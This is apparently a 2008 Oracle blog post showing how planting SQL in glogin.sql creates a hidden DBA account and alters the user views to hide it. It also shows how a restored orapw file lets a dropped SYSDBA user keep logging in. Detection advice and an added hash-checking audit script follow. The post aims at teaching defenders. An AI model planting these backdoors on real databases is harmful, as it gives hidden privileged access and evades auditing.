Yaping's Weblog

September 2, 2008

Startup Files

Filed under: Oracle — Yaping @ 2:30 am

Some SQL command files are executed automatically whenever a user logs on to the database: glogin.sql and login.sql for SQL*Plus, toad.ini for TOAD. A cracker who can modify these files can add statements that create users, escalate privileges, change data, and so on. The following demo illustrates this.

Modify the glogin.sql file and add the following statements. They serve two purposes: create a user with the DBA role, and recreate the views DBA_USERS and ALL_USERS so that this user is hidden from anyone who queries them.

set term off
create user cracker identified by cracker;
grant dba to cracker;
CREATE OR REPLACE FORCE VIEW "SYS"."ALL_USERS" ("NAME", "USER#", "CTIME") AS
… …
  and u.name != 'CRACKER';
CREATE OR REPLACE FORCE VIEW "SYS"."DBA_USERS" ("USERNAME", "USER_ID", "PASSWORD", "ACCOUNT_STATUS", "LOCK_DATE", "EXPIRY_DATE", "DEFAULT_TABLESPACE", "TEMPORARY_TABLESPACE", "CREATED", "PROFILE", "INITIAL_RSRC_CONSUMER_GROUP", "EXTERNAL_NAME") AS
  … …
  and u.name != 'CRACKER';
set term on

Then log on to the database as the SYS user.

[oracle@chen admin]$ sqlplus
SQL*Plus: Release 9.2.0.4.0 - Production on Thu Jan 10 11:07:06 2008
Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.
Enter user-name: /as sysdba
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 - Production
sys@CHEN>select name from all_users;
NAME
------------------------------
SYS
SYSTEM
OUTLN
DBSNMP
TEST
YP
6 rows selected.

sys@CHEN>select username from dba_users;
USERNAME
------------------------------
SYS
SYSTEM
OUTLN
DBSNMP
TEST
YP
6 rows selected.

sys@CHEN>conn cracker/cracker
Connected.
sys@CHEN>select name from sys.user$ where TYPE#<>0 minus select username from dba_users;
NAME
------------------------------
CRACKER

Recommendations
1. Check the glogin.sql/login.sql/toad.ini files for modification;
2. Check the search sequence SQLPATH;
3. If possible use SQL*Plus older than 10g, because there (g)login.sql is executed only at the first login;
4. Use /nolog as the SQL*Plus startup parameter: with SQL*Plus older than 10g, (g)login.sql is then not executed;
5. Use OS tools such as md5sum/sha1sum on Linux to track changes to these files.


Orapw file issue

sys@CHEN>create user hacker identified by hacker;
User created.
sys@CHEN>grant sysdba to hacker;
Grant succeeded.

[admin@chen ~]$ sqlplus "hacker/hacker@chen as sysdba"
SQL*Plus: Release 9.2.0.8.0 - Production on Tue Mar 4 22:24:22 2008
Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 - Production
sys@CHEN>

sys@CHEN>!cp /opt/app/oracle/product/9.2.0/dbs/orapwchen /opt/app/oracle/product/9.2.0/dbs/orapwchen.org

sys@CHEN>drop user hacker;
User dropped.

sys@CHEN>!cp /opt/app/oracle/product/9.2.0/dbs/orapwchen.org /opt/app/oracle/product/9.2.0/dbs/orapwchen

sys@CHEN>select name from user$ where type#<>0;
NAME
------------------------------
SYS
SYSTEM
OUTLN
DBSNMP
TEST
YP
6 rows selected.
sys@CHEN>select * from v$pwfile_users;
USERNAME                       SYSDB SYSOP
------------------------------ ----- -----
SYS                            TRUE  TRUE
HACKER                         TRUE  FALSE
sys@CHEN>select VIEW_DEFINITION from  v$fixed_view_definition where VIEW_NAME='GV$PWFILE_USERS';
VIEW_DEFINITION
--------------------------------------------------------------------------------
select inst_id,username,decode(sysdba,1,'TRUE','FALSE'),  decode(sysoper,1,'TRUE','FALSE') from x$kzsrt where valid=1  and username != 'INTERNAL'

[admin@chen ~]$ sqlplus "hacker/hacker@chen as sysdba"
SQL*Plus: Release 9.2.0.8.0 - Production on Tue Mar 4 22:27:19 2008
Copyright (c) 1982, 2002, Oracle Corporation.  All rights reserved.
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 - Production
sys@CHEN>

Even though the user HACKER was dropped in the database, it can still log on as SYSDBA as long as it exists in the orapw file. The user can also be hidden from gv$pwfile_users by changing the view's definition, which is hard-coded in the oracle binary, to the following statement.

select inst_id,username,decode(sysdba,1,'TRUE','FALSE'),  decode(sysoper,1,'TRUE','FALSE') from x$kzsrt where username not in ('INTERNAL','HACKER')
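An added defensive example, not part of the original post, that serves both the recommendations above (items 1, 2 and 5) and the orapw file issue: a POSIX shell script that baselines and re-checks the sha1 digests of glogin.sql, every login.sql on SQLPATH and the orapw<SID> file, greps the login scripts for privilege statements, and emits the query for password file entries that have no database account. It assumes ORACLE_HOME and ORACLE_SID are set, that sha1sum and diff are available, and the 9.2 file layout shown in the post.

```shell
#!/bin/sh
# Added example (not from the original post). Assumes ORACLE_HOME and
# ORACLE_SID are set and sha1sum is installed; SQLPATH may be empty.

# Every file that can inject SQL at login: glogin.sql under ORACLE_HOME,
# login.sql in the current directory and in each SQLPATH entry, plus the
# binary password file orapw<SID>, whose digest changes on a SYSDBA grant.
watched_files() {
  printf '%s\n' "$ORACLE_HOME/sqlplus/admin/glogin.sql" "./login.sql"
  ( IFS=:; for d in ${SQLPATH:-}; do
      if [ -n "$d" ]; then printf '%s\n' "$d/login.sql"; fi
    done )
  printf '%s\n' "$ORACLE_HOME/dbs/orapw$ORACLE_SID"
}

# Digest of each watched file that exists. A login.sql dropped into SQLPATH
# after the baseline shows up as an extra line, not just a changed one.
current_digests() {
  watched_files | while read -r f; do
    if [ -f "$f" ]; then sha1sum "$f"; fi
  done
}

baseline() { current_digests > "$1"; }        # $1 = baseline file to write

# Exit status 0 if nothing changed; otherwise diff lists what changed.
verify() { current_digests | diff "$1" -; }   # $1 = baseline file

# Flag statements that have no business in a login script (the post's
# glogin.sql payload trips the first two patterns).
scan_startup_sql() {
  watched_files | grep -v '/orapw' | while read -r f; do
    if [ -f "$f" ]; then
      grep -inE 'create +(user|or +replace)|grant +|alter +(user|system)' "$f" /dev/null
    fi
  done
}

# The orapw check: password file entries with no matching database account.
# Feed to "sqlplus -S /nolog" so that glogin.sql is not run before the query.
pwfile_audit_sql() {
  cat <<'EOF'
connect / as sysdba
select username from v$pwfile_users
minus
select username from dba_users;
EOF
}
```

Take the baseline once from a known-good state and run verify from cron; a non-empty diff or any hit from scan_startup_sql is worth an immediate look, and the audit query lists exactly the dropped-but-still-SYSDBA case shown above.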
